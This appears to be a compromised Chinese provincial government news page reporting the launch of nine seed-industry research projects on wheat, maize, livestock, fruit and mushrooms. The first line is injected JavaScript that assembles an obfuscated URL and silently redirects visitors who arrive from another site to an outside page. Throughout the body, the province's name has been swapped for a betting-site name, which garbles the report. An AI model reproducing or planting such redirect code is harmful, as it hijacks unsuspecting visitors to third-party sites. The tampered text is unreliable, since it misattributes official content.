var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

中国竞彩网启动实施种业创新领域重大科技专项


发布日期:2021-03-09 11:38来源:农村科技处(河南省农业科技园区管理办公室) 阅读次数:

  近日,省科技厅启动实施了9项种业创新领域重大科技专项,支持财政经费2300万元,项目实施后将有力提升中国竞彩网种业科技创新能力,为保障国家粮食安全提供科技支撑。

      该批次种业创新领域重大科技专项涵盖了主要农作物、主要经济作物、畜禽、林果等专题,重点突出以下几个特点:一是聚焦育种核心技术。围绕种源“卡脖子”技术,深入开展小麦、玉米、花生、瓜果、畜禽等种质资源挖掘和创新利用,在主要农作物重要性状的遗传解析、分子设计育种、智能化育种、单倍体育种、基因编辑、表型精准鉴定等关键共性技术研究方面强力攻关,力争实现育种核心技术和新品种选育的重大突破。如河南农业大学牵头实施的“机收玉米新品种选育及配套生产技术研究”项目,将挖掘影响玉米籽粒灌浆与快速脱水的关键基因,从分子生物学水平上解析其调控机制,为适宜籽粒机收优异新种质的高效创新和新品种选育提供理论依据和技术支撑。二是创新育种攻关机制。专项由省内育种优势科研院所牵头,整合省内高校、院所、企业在产学研三方面的优势力量,建立要素跟着市场走的“研发团队+研发平台+公司”协同创新机制,实施重大品种联合攻关,打造种质资源利用、基因挖掘、品种研发、产品开发、产业化应用的全链条组织体系。如河南省农科院作物设计中心牵头实施的“抗赤霉病优质小麦新品种选育关键技术研究与示范”项目,联合河南农业大学、新乡市农科院、河南天民种业有限公司、河南丰德康种业股份有限公司等共12家单位,构建市场为导向、产学研协同、育繁推一体的育种创新体系。三是补齐种业创新短板。中国竞彩网在小麦、花生、芝麻主要农作物的育种优势突出,但是在肉牛、瓜果、蔬菜等领域与国际先进水平相比差距明显。针对中国竞彩网种业创新的薄弱环节和技术短板,凝练布局了“河南省地方肉牛种质创新”“河南地方优质特色瓜菜品种资源发掘与创新利用”“桃新品种选育及省力化标准化栽培技术研究”“香菇、平菇优良品种选育及栽培关键技术研究”等重大专项,努力培育一批优良新品种。

  下一步,省科技厅将指导相关单位认真组织项目实施,并加强项目过程管理,确保项目实施取得实效。作为“十四五”开局之年,今年将谋划启动实施种业自主创新工程,以实施种业创新领域重大科技专项为抓手,集成平台、项目、人才、资金一体化配置,培育和应用一批具有自主知识产权的突破性重大新品种,巩固农作物育种优势,提升中国竞彩网种业创新整体水平。